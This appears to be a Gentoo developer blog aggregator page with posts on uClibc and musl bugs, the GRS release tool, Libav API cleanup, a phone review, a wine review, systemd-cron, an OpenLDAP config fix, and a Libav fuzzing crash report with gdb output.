Anthony Basile a.k.a. blueness (homepage, bugs)

About five years ago, I became interested in alternative C standard libraries like uClibc and musl and their application to more than just embedded systems.  Diving into the implementation details of those old familiar C functions can be tedious, but also challenging especially under constraints of size, performance, resource consumption, features and correctness.  Yet these details can make a big difference as you can see from this comparison of glibc, uClibc, dietlibc and musl.  I first encountered libc performance issues when I was doing number crunching work for my ph.d. in physics at Cornell  in the late 80’s.  I was using IBM RS6000’s (yes!) and had to jump into the assembly.  It was lots of fun and I’ve loved this sort of low level stuff ever since.

Over the past four years, I’ve been working towards producing stage3 tarballs for both uClibc and musl systems on various arches, and with help from generous contributors (thanks guys!), we now have a pretty good selection on the mirrors.  These stages are not strictly speaking embedded in that they do not make use of busybox to provide their base system.  Rather, they employ the same packages as our glibc stages and use coreutils, util-linux, net-tools and friends.  Except for small details here and there, they only differ from our regular stages in the libc they use.

If you read my last blog posting on this new release engineering tool I’m developing called GRS, you’ll know that I recently hit a milestone in this work.  I just released three hardened, fully featured XFCE4 desktop systems for amd64.  These systems are identical to each other except for their libc, again modulo a few details here and there.  I affectionately dubbed these Bluemoon for glibc, Lilblue for uClibc, and Bluedragon for musl.  (If you’re curious about the names, read their homepages.)  You can grab all three off my dev space , or off the mirrors under experimental/amd64/{musl,uclibc} if you’re looking for just Lilblue or Bluedragon — the glibc system is too boring to merit mirror space.  I’ve been maintaining Lilblue for a couple of years now, but with GRS, I can easily maintain all three and its nice to have them for comparison.

If you play with these systems, don’t expect to be blown away by some amazing differences.  They are there and they are noticeable, but they are also subtle.  For example, you’re not going to notice code correctness in, say, pthread_cancel() unless you’re coding some application and expect certain behavior but don’t get it because of some bad code in your libc.  Rather,  the idea here is push the limits of uClibc and musl to see what breaks and then fix it, at least on amd64 for now.  Each system includes about 875 packages in the release tarballs, and an extra 5000 or so binpkgs built using GRS.  This leads to lots of breakage which I can isolate and address.  Often the problem is in the package itself, but occasionally it’s the libc and that’s where the fun begins!  I’ve asked Patrick Lauer for some space where I can set up my GRS builds and serve out the binpkgs.  Hopefully he’ll be able to set me up with something.  I’ll also be able to make the build.log’s available for packages that fail via the web, so that GRS will double as a poor man’s tinderbox.

In a future article I’ll discuss musl, but in the remainder of this post, I want to highlight some big ticket items we’ve hit in uClibc.  I’ve spent a lot of time building up machinery to maintain the stages and desktops, so now I want to focus my attention on fixing the libc problems.  The following laundry list is as much a TODO for me as it is for your entertainment.  I won’t blame you if you want to skip it.  The selection comes from Gentoo’s bugzilla and I have yet to compare it to upstream’s bugs since I’m sure there’s some overlap.

Currently there are thirteen uClibc stage3’s being supported:

  • stage3-{amd64,i686}-uclibc-{hardened,vanilla}
  • stage3-armv7a_{softfp,hardfp}-uclibc-{hardened,vanilla}
  • stage3-mipsel3-uclibc-{hardened,vanilla}
  • stage3-mips32r2-uclibc-{hardened,vanilla}
  • stage3-ppc-uclibc-vanilla

Here hardened and vanilla refer to the toolchain hardening as we do for regular glibc systems.  Some bugs are arch specific some are common.  Let’s look at each in turn.

* amd64 and i686 are the only stages considered stable and are distributed along side our regular stage3 releases in the mirrors.  However, back in May I hit a rather serious bug (#548950) in amd64 which is our only 64-bit arch.  The problem was in the the implementation of pread64() and pwrite64() and was triggered by a change in the fsck code with e2fsprogs-1.42.12.  The bug led to data corruption of ext3/ext4 filesystem which is a very serious issue for a release advertised as stable.  The problem was that the wrong _syscall wrapper was being used for amd64.  If we don’t require 64-bit alignment, and you don’t on a 64-bit arch (see uClibc/libc/sysdeps/linux/x86_64/bits/uClibc_arch_features.h), then you need to use _syscall4, not _syscall6.

The issue was actually fixed by Mike Frysinger (vapier) in uClibc’s git HEAD but not in the 0.9.33 branch which is the basis of the stages.  Unfortunately, there hasn’t been a new release of uClibc in over three year so backporting meant disentangling the fix from some new thread cancel stuff and was annoying.

* The armv7a stages are close to being stable, but they are still being distributed in the mirrors under experimental.  The problem here is not uClibc specific, but due to hardened gcc-4.8 and it affects all our hardened arm stages.  With gcc-4.8, we’re turning on -fstack-check=yes by default in the specs and this breaks alloca().  The workaround for now is to use gcc-4.7, but we should turn off -fstack-check for arm until bug #518598 – (PR65958) is fixed.

* I hit this one weird bug when building the mips stages, bug #544756.  An illegal instruction is encountered when building any version of python using gcc-4.9 with -O1 optimization or above, yet it succeeds with -O0.  What I suspect happened here is some change in the optimization code for mips between gcc-4.8 and 4.9 introduced the problem.  I need to distill out some reduced code before I submit to gcc upstream.   For now I’ve p.masked >=gcc-4.9 in default/linux/uclibc/mips.  Since mips lacks stable keywords, this actually brings the mips stages in better line with the other stages that use gcc-4.8 (or 4.7 in the case of hardened arm).

* Unfortunately, ppc is plagued with bug #517160PIE code is broken on ppc and causes a seg fault in plt_pic32.__uClibc_main ().  Since PIE is an integral part of how we do hardening in Gentoo, there’ s no hardened ppc-uclibc stage.  Luckily, there are no known issues with the vanilla ppc stage3.

Finally, there are five interesting bugs which are common to all arches.  These problems lie in the implementation of functions in uClibc and deviate from the expected behavior.  I’m particularly grateful to who found them by running the test suite for various packages.

* Bug 527954 – One of wget’s tests makes use of fnmatch(3) which intelligently matches file names or paths.  On uClibc, there is an unexpected failure in a test where it should return a non-match when fnmatch’s options contains FNM_PATHNAME and a matching slash is not present in both strings.  Apparently this is a duplicate of a really old bug (#181275).

* Bug 544118René noticed this problem in an e2fsprogs test for  The failure here is due to the fact that setbuf(3) is ineffective at changing the buffer size of stdout if it is run after some printf(1).  Output to stdout is buffered while output to stderr is not.  This particular test tries to preserve the order of output from a sequence of writes to stdout and stderr by setting the buffer size of stdout to zero.  But setbuf() only works on uClibc if it is invoked before any output to stdout.  As soon as there is even one printf(), all invocations to setbuf(stdout, …) are ineffecitve!

* Bug 543972 – This one came up in the gzip test suite.  One of the tests there checks to make sure that gzip properly fails if it runs out of disk space.  It uses /dev/full, which is a pseudo-device provided by the kernel that pretends to always be full.  The expectation is that fclose() should set errno = ENOSPC when closing /dev/full.  It does on glibc but it doesn’t in uClibc.  It actually happens when piping stdout to /dev/full, so the problem may even be in dup(2).

* Bug 543668 – There is some problem in uClibc’s dopen()/dlclose() code.  I wrote about this in a previous blog post and also hit it with syslog-ng’s plugin system.  A seg fault occurs when unmapping a plugin from the memory space of a process during do_close() in uClibc/ldso/libdl/libdl.c.  My guess is that the problem lies in uClibc’s accounting of the mappings and when it tries to unmap an area of memory which is not mapped or was previously unmapped, it seg faults.

August 03, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Syncopation red wine blend - Mike Ward on Wine - Augusta, MOThis past weekend, I was visiting my good friends at The Wine Barrel for their weekly wine tasting, and I got a neat surprise when I was there. Certified Sommelier, Mike Ward of Ward on Wine was there with a new project of his called Syncopation. Syncopation is a private-label red wine blend produced in Augusta, MO, which, if you didn’t know, was the first AVA recognised by the United States Federal Government in 1980 (beating out Napa).

Having been to some of Mike’s classes (including ones about two of my favourite countries for wine [Italy and Spain]), I was confident that any wine he would stand behind would be a worthwhile investment. Though I’m not usually partial to wines from Missouri, the way that he described Syncopation as being “medium bodied with some nice red fruits and a little spice” was enticing to me. Before getting to my personal impressions and review of Syncopation Rhythmic Red blend, here are some interesting notes about it:

  • It is a blend of Chambourcin, Vidal blanc, Seyval blanc, and Traminette
    • Chambourcin is really a red grape, whilst the other three are white grapes
    • Chambourcin can be made so that it is dry or semi-sweet
    • Vidal blanc is related to Trebbiano, which is a grape noted for wines from Italy and France (where it is more commonly known as Ugni blanc)

Mike indicated to me that this particular wine is best enjoyed at a slightly chilled temperature (16-18°C / 60-65°F), but that I should try it right out of the bottle beforehand, and make my own assessments. I will agree with him that it is better with a light chill on it, and after it has decanted for 20-30 minutes. Since I did try it both ways, I will separate my tasting notes into two corresponding sections.

Right out of the bottle
When I first tried Syncopation, I noticed a slight sweetness to it, which is the signature of some of the white blends from St. James Winery and others in Missouri. It was forward with a burst of freshly picked strawberries, and had delicate notes of Victoria plums in the mid-palate. It was light-to-medium bodied, and had an almost effervescent mouthfeel, though there were no bubbles at all.

Chilled accordingly
After my bottle of Syncopation had chilled to the recommended temperature, I tried it again. To me, the differences were night and day! As expected, the slight chill intensified the flavours of strawberry and plum that I had originally noted, making them more bold and readily recognisable. The effervescence that I mentioned was no longer present, and the mouthfeel had tightened to a more medium-body. Most impressive to me was how the chilling and decanting brought some underlying subtleties to the surface. I really enjoyed some notes of cherry cola, white pepper, and most prominently, coastal sage scrub.

Mike Ward on Wine and Zach - first sale of Syncopation Rhythmic Red Blend
Mike Ward and Zach – First sale of Syncopation Red Wine
Click to enlarge

Overall impressions
As someone who enjoys the intense wines of Priorat, Spain and yet the subtleties of a Brunello di Montelcino, I found Sycnopation to be a bit light for my preference. That being said, it is an approachable red wine for sweet and semi-sweet white wine lovers, yet tannic enough to appease staunch red drinkers. To me, Syncopation lives up to its name in that it is rhythmic and flowing. It also captures the joys of summer, and is able to—with its beautiful notes of strawberry and white-fleshed plum—cut through the ofttimes oppressive humidity that can accompany a Saint Louis August. If you think you know what Missouri wines are “all about,” or if you just would like an unassuming light-to-medium red blend that is new and exciting, I urge you to give Syncopation a try!


July 31, 2015
Anthony Basile a.k.a. blueness (homepage, bugs)

The other day I installed Ubuntu 15.04 on one of my boxes.  I just needed something where I could throw in a DVD, hit install and be done.  I didn’t care about customization or choice, I just needed a working Linux system from which I could chroot work.  Thousands of people around the world install Ubuntu this way and when they’re done, they have a stock system like any other Ubuntu installation, all identical like frames in a Andy Warhol lithograph.   Replication as a form of art.

In contrast, when I install a Gentoo system, I enjoy the anxiety of choice.  Should I use syslog-ng, metalog, or skip a system logger altogether?  If I choose syslog-ng, then I have a choice of 14 USE flags for 2^14 possible configurations for just that package.  And that’s just one of some 850+ packages that are going to make up my desktop.  In contrast to Ubuntu where every installation is identical (whatever “idem” means in this context), the shear space of possibilities make no two Gentoo systems the same unless there is some concerted effort to make them so.  In fact, Gentoo doesn’t even have a notion of a “stock” system unless you count the stage3s which are really bare bones.  There is no “stock” Gentoo desktop.

With the work I am doing with uClibc and musl, I needed a release tool that would build identical desktops repeatedly and predictably where all the choices of packages and USE flags were layed out a priori in some specifications.  I considered catalyst stage4, but catalyst didn’t provide the flexibility I wanted.  I initially wrote some bash scripts to build an XFCE4 desktop from uClibc stage3 tarballs (what I dubbed “Lilblue Linux“), but this was very much ad hoc code and I needed something that could be generalized so I could do the same for a musl-based desktop, or indeed any Gentoo system I could dream up.

This led me to formulate the notion of what I call a “Gentoo Reference System” or GRS for short — maybe we could make stock Gentoo systems available.  The idea here is that one should be able to define some specs for a particular Gentoo system that will unambiguously define all the choices that go into building that system.  Then all instances built according to those particular GRS specs would be identical in much the same way that all Ubuntu systems are the same.  In a Warholian turn, the artistic choices in designing the system would be pushed back into the specs and become part of the automation.  You draw one frame of the lithograph and you magically have a million.

The idea of these systems being “references” was also important for my work because, with uClibc or musl, there’s a lot of package breakages — remember you pushing up against actual implementations of C functions and nearly everything in your systems written in C.  So, in the space of all possible Gentoo systems, I needed some reference points that worked.  I needed that magical combinations of flags and packages that would build and yield useful systems.  It was also important that these references be easily kept working over time since Gentoo systems evolve as the main tree, or overlays, are modified.  Since on some successive build something might break, I needed to quickly identify the delta and address it.  The metaphor that came up in my head from my physics background is that of phase space.  In the swirling mass of evolving dynamical systems, I pictured these “Gentoo Reference Systems” as markers etching out a well defined path over time.

Enough with the metaphors, how does GRS work?  There are two main utilities, grsrun and grsup.  The first is run on a build machine and generates the GRS release as well as any extra packages and updates.  These are delivered as binpkgs.  In contrast, grsup is run on an installed GRS instance and its used for package management.  Since we’re working in a world of identical systems, grsup prefers working with binpkgs that are downloaded from some build machine, but it can revert to building locally as well.

The GRS specs for some system are found on a branch of a git repository.  Currently the repo at has four branches, each for one of the four GRS specs housed there.  grsrun is then directed to sync the remote repo locally, check out the branch of the GRS system we want to build and begin reading a script file called build which directs grsrun on what steps to take.  The scripting language is very simple and contains only a handful of different directives.  After a stage tarball is unpacked, build can direct grsrun to do any of the following:

mount and umount – Do a bind mount of /dev/, /dev/pts/ and other directories that are required to get a chroot ready.

populate – Selectively copy files from the local repo to the chroot.  Any files can be copied in, so, for example, you can prepare a pristine home directory for some user with a pre-configured desktop.  Or you can add customized configuration files to /etc for services you plan to run.

runscript – This will run some bash or python script in the chroots.  The scripts are copied from the local repo to /tmp of the chroot and executed there.  These scripts can be like the ones that catalyst runs during stage1/2/3 but can also be scripts to add users and groups, to add services to runlevels, etc.  Think of anything you would do when growing a stage3 into the system you want, script it up and GRS will automated it for you.

kernel – This looks for a kernel config file in the local repo, parses it for the version, builds it and both bundles it as a packages called linux-image-<version>.tar.xz for later distribution as well as installs it into the chroot.  grsup knows how to work with these linux-image-<version>.tar.xz files and can treat them like binpkgs.

tarit and hashit – These directives create a release tarball of the entire chroot and generate the digests.

pivot – If you built a chroot within a chroot, like catalyst does during stage1, then this pivots the inner chroot out so that further building can make use of it.

From an implementation point of view, the GRS suite is written in python and each of the above directives is backed by a simple python class.  Its easy, for instance, to implement more directives this way.  E.g. if you want to build a bootable CD image, you can include a directive called isoit, write a python class for what’s required to construct the iso image and glue this new class into the grs module.

If you’re familiar with catalyst, at this point you might be wondering what’s the difference?  Can’t you do all of this with catalyst?  There is a lot of overlap, but the emphasis is different.  For example, I wanted to be able to drop in a pre-configured desktop for a user.  How would I do that with catalyst?  I guess I could create an overlay with packages for some pre-built home directory but that’s a perversion of what ebuilds are for — we should never be installing into /home.  Rather with grsrun I can just populate the chroot with whatever files I like anywhere in the filesystem.  More importantly, I want to be able control what USE flags are set and, in general, manage all of /etc/portage/catalyst does provide portage_configdir which populates /etc/portage when building stages, but its pretty static.  Instead, grsup and two other utilities, install-worldconf and clean-worldconf, can dynamically manage files under /etc/portage/ according to a configuration file called world.conf.

Lapsing back into metaphor, I see catalyst as rigid and frozen whereas grsrun is loose and fluid.  You can use grsrun to build stage1/2/3 tarballs which are identical to those built with catalyst, and in fact I’ve done so for hardened amd64 mutlilib stages so I could compare.  But with grsrun you have too much freedom in writing the scripts and file that go into the GRS specs and chances are you’ll get something wrong, whereas with catalyst the build is pretty regimented and you’re guaranteed to get uniformity across arches and profiles.  So while you can do the same things with each tool, its not recommended that you use grsrun to do catalyst stage builds — there’s too much freedom.  Whereas when building desktops or servers you might welcome that freedom.

Finally, let me close with how grsup works.  As mentioned above, the GRS specs for some system include a file called world.conf.  Its in configparser format and it specifies files and their contents in the /etc/portage/ directory.  An example section in the file looks like:

package.use : app-crypt/gpgme:1 -common-lisp static-libs
package.env : app-crypt/gpgme:1 app-crypt_gpgme_1
env : LDFLAGS=-largp

This says, for package app-crypt/gpgme:1, drop a file called app-crypt_gpgme_1 in /etc/portage/package.use/ that contains the line “app-crypt/gpgme:1 -common-lisp static-libs”, drop another file by the same name in /etc/portage/package.env/ with line “app-crypt/gpgme:1 app-crypt_gpgme_1″, and finally drop a third file by the same name in /etc/portage/env/ with line “LDFLAGS=-largp”.   grsup is basically a wrapper to emerge which first populates /etc/portage/ according to the world.conf file, then emerges the requested pkg(s) preferring the use of binpkgs over building locally as stated above, and finally does a clean up on /etc/portage/install-worldconf and clean-worldconf isolate the populate and clean up steps so they can be used in scripts run by grsrun when building the release.  To be clear, you don’t have to use grsup to maintain a GRS system.  You can maintain it just like any other Gentoo system, but if you manage your own /etc/portage/, then you are no longer tracking the GRS specs.  grsup is meant to make sure you update, install or remove packages in a manner that keeps the local installation in compliance with the GRS specs for that system.

All this is pretty alpha stuff, so I’d appreciate comments on design and implementation before things begin to solidify.  I am using GRS to build three desktop systems which I’ll blog about next.  I’ve dubbed these systems Lilblue which is a hardened amd64 XFCE4 desktop with uClibc as its standard libc, Bluedragon that uses musl, and finally Bluemoon which uses good old glibc.  (Lilblue is actually a few years old, but the latest release is the first built using GRS.)  All three desktops are identical with respect to the choice of packages and USE flags, and differ only in their libc’s so one can compare the three.  Lilbue and Bluedragon are on the mirrors, or you can get all three from my dev space at  I didn’t push out bluemoon on the mirrors because a glibc based desktop is nothing special.  But since building with GRS is as simple as cloning a git branch and tweaking, and since the comparison is useful, why not?

The GRS home page is at

July 30, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Cleaner API (July 30, 2015, 17:50 UTC)

We are getting closer to a new release and you can see it is an even release by the amount of old and crufty code we are dropping. This usually is welcomed by some people and hated by others. This post is trying to explain what we do and why we are doing it.

New API and old API

Since the start of Libav we tried to address the painful shortcomings of the previous management, here the short list:

  • No leaders or dictators, there are rules agreed by consensus and nobody bends them.
  • No territoriality, nobody “owns” a specific area of the codebase nor has special rights on it.
  • No unreviewed changes in the tree, all the patches must receive an Ok by somebody else before they can be pushed in the tree.
  • No “cvs is the release”, major releases at least twice per year, bugfix-only point releases as often as needed.
  • No flames and trollfests, some basic code of conduct is enforced.

One of the effect of this is that the APIs are discussed, proposals are documented and little by little we are migrating to a hopefully more rational and less surprising API.

What’s so bad regarding the old API?

Many of the old APIs were not designed at all, but just randomly added because mplayer or ffmpeg.c happened to need some
feature at the time. The result was usually un(der)documented, hard to use correctly and often not well defined in some cases. Most users of the old API that I’ve seen actually used it wrong and would at best occasionally fail to work, at worst crash randomly.
– Anton

To expand a bit on that you can break down the issues with the old API in three groups:

  • Unnamespaced common names (e.g. CODEC_ID_NONE), those may or might not clash with other libraries.
  • Now-internal-only fields previously exposed that were expected to be something that are not really are (e.g. AVCodecContext.width).
  • Functionality not really working well (e.g. the old audio resampler) for which a replacement got provided eventually (AVResample).

The worst result of API misuse could be a crash in specific situations (e.g. if you use the AVCodecContext dimension when you should use the AVFrame dimensions to allocate your screen surface you get quite an ugly crash since the former represent the decoding time dimension while the latter the dimensions of the frame you are going to present and they can vary a LOT).

But Compatibility ?!

In Libav we try our best to give migration paths and in the past years we even went over the extra mile by providing patches for quite a bit of software Debian was distributing at the time. (Since nobody even thanked for the effort, I doubt the people involved would do that again…)

Keeping backwards compatibility forever is not really feasible:

  • You do want to remove a clashing symbol from your API
  • You do want to not have application crashing because of wrong assumptions
  • You do want people to use the new API and not keep compatibility wrappers that might not work in certain
    corner cases.

The current consensus is to try to keep an API deprecated for about 2 major releases, with release 12 we are dropping code that had been deprecated since 2-3 years ago.


I had been busy with my dayjob deadlines so I couldn’t progress on the new api for avformat and avcodec I described before, probably the next blogpost will be longer and a bit more technical again.

July 27, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

One in every 600 websites has .git exposed

July 25, 2015
Doogee Y100 Pro (July 25, 2015, 23:37 UTC)

For a while, I have been looking for a replacement for my Nexus 4. I have been mostly pleased with it, but not completely. The two things that bothered me most were the lack of dual-SIM and (usable) LTE.

So I ordered a Doogee Valencia2 Y100 Pro at Gearbest when it was announced in June, which seemed to be almost the perfect device for my needs and at 119 USD quite inexpensive too.

Pre-ordering a phone from a Chinese manufacturer without any existing user reports is quite a risk. Occasionally, these phones turn out to be not working well and getting after-sales support or even updates can be difficult. I decided to take the plunge anyway.

Two very good reviews have been published on YouTube in the meantime. You may want to check them out:

My phone arrived two days ago, so here are my initial impressions:

The package contents

The phone came with a plastic hardcover and screen protector attached. In the box there was a charger and USB cable, headphones, a second screen protector and an instruction manual.

Gearbest also included a travel adaptor for the charger. Some assembly required.


Phone specs: Advertisement and reality

The advertised specs of the phone (5" 720p screen, MT6735 64-bit quad-core, 13 MP camera, 2200 mAh battery, etc.) sounded almost too good to be true for that price. Unfortunately, they turned out too good to be true.

The following table shows the advertised specs and the contrast to reality:
5" 1280x720 IPS capacitive 5-point touch screen5" 1280x720 IPS capacitive 5-point touch screen
Mediatek MT6735 64-bit, 1.0 GHzMediatek MT6735P, 1.0 GHz. Phone comes with 32 bit Android installedClock frequency was originally advertised as 1.3 GHz, but later changed without notice to 1.0 GHz. The MT6735P has a slower GPU than the MT6735.
2 GB RAM, 16 GB flash memory2 GB RAM, 16 GB flash memory
13 MP rear, 8 MP front camera13 MP and 8 MP are most likely only interpolated
2200 mAh battery1800 mAh batteryThere is a sticker on the battery which says 2200 mAh, but when you peel it off it reveals the manufacturer label which says 1800 mAh.
Weight: 151 g including batteryWeight: 159 g including batterypicture of phone on a kitchen scale

This kind of exaggeration appears to be common for phones in the Chinese domestic market. But some folks still need to learn that when doing business internationally, such trickery just hurts your reputation.

With that out of the way, let's take a closer look at the device:

CPU and Linux kernel

$ uname -a
Linux localhost 3.10.65+ #1 SMP PREEMPT Fri Jul 10 20:28:28 CST 2015 armv7l GNU/Linux
shell@Y100pro:/ $ cat /proc/cpuinfo                                        
Processor : ARMv7 Processor rev 4 (v7l)
processor : 0
BogoMIPS : 32.39
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xd03
CPU revision : 4

Hardware : MT6735P
Revision : 0000
Serial : 0000000000000000


Although the rear camera appears to not have a 13 MP sensor (the YouTube reviewers above think it is more like 8 MP), it still manages to reach a quite acceptable picture quality.

Comparing day and night shots

HDR off / HDR on


As you can expect, the MT6735P does not particularly shine in benchmarks. The UI however feels snappy and smooth, and web browsing is fine even on complex websites.

Interim conclusion

Despite the exaggerated (you could also say, dishonest) advertisement, I am satisfied with the Doogee Y100 Pro. You can't really expect more for the price.

What next?

Next I will try to get a Gentoo Prefix up on the device. I will post an update then.

Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this on Twitter, found it a very interesting read.

Hacking Team: a zero-day market case study

July 23, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Tasty calamares in Gentoo (July 23, 2015, 20:36 UTC)

First of all it’s nothing to eat. So what is it then? This is the introduction by upstream:

Calamares is an installer framework. By design it is very customizable, in order to satisfy a wide variety of needs and use cases. Calamares aims to be easy, usable, beautiful, pragmatic, inclusive and distribution-agnostic. Calamares includes an advanced partitioning feature, with support for both manual and automated partitioning operations. It is the first installer with an automated “Replace Partition” option, which makes it easy to reuse a partition over and over for distribution testing. Got a Linux distribution but no system installer? Grab Calamares, mix and match any number of Calamares modules (or write your own in Python or C++), throw together some branding, package it up and you are ready to ship!

I have just added newest release version (1.1.2) to the tree and in my dev overlay a live version (9999). The underlaying technology stack is mainly Qt5, KDE Frameworks, Python3, YAML and systemd. It’s picked up and of course in evaluation process by several Linux distributions.

You may asking why i have added it to Gentoo then where we have OpenRC as default init system?! You are right at the moment it is not very useful for Gentoo. But for example Sabayon as a downstream of us will (maybe) use it for the next releases, so in the first place it is just a service for our downstreams.

The second reason, there is a discussion on gentoo-dev mailing list at the moment to reboot the Gentoo installer. Instead of creating yet another installer implementation, we have two potential ways to pick it up, which are not mutual exclusive:

1. Write modules to make it work with sysvinit aka OpenRC
2. Solve Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

Have fun!

[2] johu dev overlay
[3] gentoo-dev ml – Rebooting the Installer Project
[4] Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

July 22, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)


These are the slides of my EuroPython 2015 talk.

The source code and ansible playbooks are available on github !

July 20, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Since updating to VMware Workstation 11 (from the Gentoo vmware overlay), I've experienced a lot of hangs of my KDE environment whenever a virtual machine was running. Basically my system became unusable, which is bad if your workflow depends on accessing both Linux and (gasp!) Windows 7 (as guest). I first suspected a dbus timeout (doing the "stopwatch test" for 25s waits), but it seems according to some reports that this might be caused by buggy behavior in kwin (4.11.21). Sadly I haven't been able to pinpoint a specific bug report.

Now, I'm not sure if the problem is really 100% fixed, but at least now the lags are much smaller- and here's how to do it (kudos to matthewls and vrenn): 

  • Add to /etc/xorg.conf in the Device section
    Option "TripleBuffer" "True"
  • Create a file in /etc/profile.d with content
    (yes that starts with a double underscore).
  • Log out, stop your display manager, restart it.
I'll leave it as an exercise to the reader to figure out what these settings do. (Feel free to explain it in a comment. :) No guarantees of any kind. If this kills kittens you have been warned. Cheers.

July 18, 2015
Richard Freeman a.k.a. rich0 (homepage, bugs)
Running cron jobs as units automatically (July 18, 2015, 16:00 UTC)

I just added sys-process/systemd-cron to the Gentoo repository.  Until now I’ve been running it from my overlay and getting it into the tree was overdue.  I’ve found it to be an incredibly useful tool.

All it does is install a set of unit files and a crontab generator.  The unit files (best used by starting/enabling will run jobs from /etc/cron.* at the appropriate times.  The generator can parse /etc/crontab and create timer units for every line dynamically.

Note that the default Gentoo install runs the /etc/cron.* jobs from /etc/crontab, so if you aren’t careful you might end up running them twice.  The simplest solutions this are to either remove those lines from /etc/crontab, or install systemd-cron using USE=etc-crontab-systemd which will have the generator ignore /etc/crontab and instead look for /etc/crontab-systemd where you can install jobs you’d like to run using systemd.

The generator works like you’d expect it to – if you edit the crontab file the units will automatically be created/destroyed dynamically.

One warning about timer units compared to cron jobs is that the jobs are run as services, which means that when the main process dies all its children will be killed.  If you have anything in /etc/cron.* which forks you’ll need to have the main script wait at the end.

On the topic of race conditions, each cron.* directory and each /etc/crontab line will create a separate unit.  Those units will all run in parallel (to the extent that one is still running when the next starts), but within a cron.* directory the scripts will run in series.  That may be a bit different from some cron implementations which may limit the number of simultaneous jobs globally.

All the usual timer unit logic applies.  stdout goes to the journal, systemctl list-timers shows what is scheduled, etc.

Filed under: gentoo, linux, systemd

July 17, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
OpenLDAP upgrade trap (July 17, 2015, 03:29 UTC)

After spending a few hours trying to figure out why OpenLDAP 2.4 did not want to return any results while 2.3 worked so nicely ...

The following addition to the slapd config file Makes Things Work (tm) - I have no idea if this is actually correct, but now things don't fail.

access to dn.base="dc=example,dc=com"
    by anonymous search
    by * none
I didn't notice this change in search behaviour in any of the Changelog, Upgrade docs or other documentation - so this is quite 'funny', but not really nice.

July 16, 2015

Libav is an open source set of tools for audio and video processing.

After talking with Luca Barbato which is both a Gentoo and Libav developer, I spent a bit of my time fuzzing libav and in particular I fuzzed libavcodec though avplay.
I hit a crash and after I reported it to upstream, they confirmed the issue as a divide-by-zero.

The complete gdb output:

ago@willoughby $ gdb --args /usr/bin/avplay avplay.crash 
GNU gdb (Gentoo 7.7.1 p1) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/avplay...Reading symbols from /usr/lib64/debug//usr/bin/avplay.debug...done.
(gdb) run
Starting program: /usr/bin/avplay avplay.crash
warning: Could not load shared library symbols for
Do you need "set solib-search-path" or "set sysroot"?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/".
avplay version 11.3, Copyright (c) 2003-2014 the Libav developers
  built on Jun 19 2015 09:50:59 with gcc 4.8.4 (Gentoo 4.8.4 p1.6, pie-0.6.1)
[New Thread 0x7fffec4c7700 (LWP 7016)]
[New Thread 0x7fffeb166700 (LWP 7017)]
INFO: AddressSanitizer ignores mlock/mlockall/munlock/munlockall
[New Thread 0x7fffe9e28700 (LWP 7018)]
[h263 @ 0x60480000f680] Format detected only with low score of 25, misdetection possible!
[h263 @ 0x60440001f980] Syntax-based Arithmetic Coding (SAC) not supported
[h263 @ 0x60440001f980] Reference Picture Selection not supported
[h263 @ 0x60440001f980] Independent Segment Decoding not supported
[h263 @ 0x60440001f980] header damaged

Program received signal SIGFPE, Arithmetic exception.
[Switching to Thread 0x7fffe9e28700 (LWP 7018)]
0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
142     /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c: No such file or directory.
(gdb) bt
#0  0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
#1  0x00007ffff21f3c2d in ff_h263_decode_picture_header (s=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:1112
#2  0x00007ffff1ae16ed in ff_h263_decode_frame (avctx=0x60440001f980, data=0x60380002f480, got_frame=0x7fffe9e272f0, avpkt=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/h263dec.c:444
#3  0x00007ffff2cd963e in avcodec_decode_video2 (avctx=0x60440001f980, picture=0x60380002f480, got_picture_ptr=got_picture_ptr@entry=0x7fffe9e272f0, avpkt=avpkt@entry=0x7fffe9e273b0) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/utils.c:1600
#4  0x00007ffff44d4fb4 in try_decode_frame (st=st@entry=0x60340002fb00, avpkt=avpkt@entry=0x601c00037b00, options=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:1910
#5  0x00007ffff44ebd89 in avformat_find_stream_info (ic=0x60480000f680, options=0x600a00009e80) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:2276
#6  0x0000000000431834 in decode_thread (arg=0x7ffff7e0b800) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/avplay.c:2268
#7  0x00007ffff0284b08 in ?? () from /usr/lib64/
#8  0x00007ffff02b4be9 in ?? () from /usr/lib64/
#9  0x00007ffff4e65aa8 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.4/
#10 0x00007ffff0062204 in start_thread () from /lib64/
#11 0x00007fffefda957d in clone () from /lib64/

Affected version:
11.3 (and maybe past versions)

Fixed version:
11.5 and 12.0

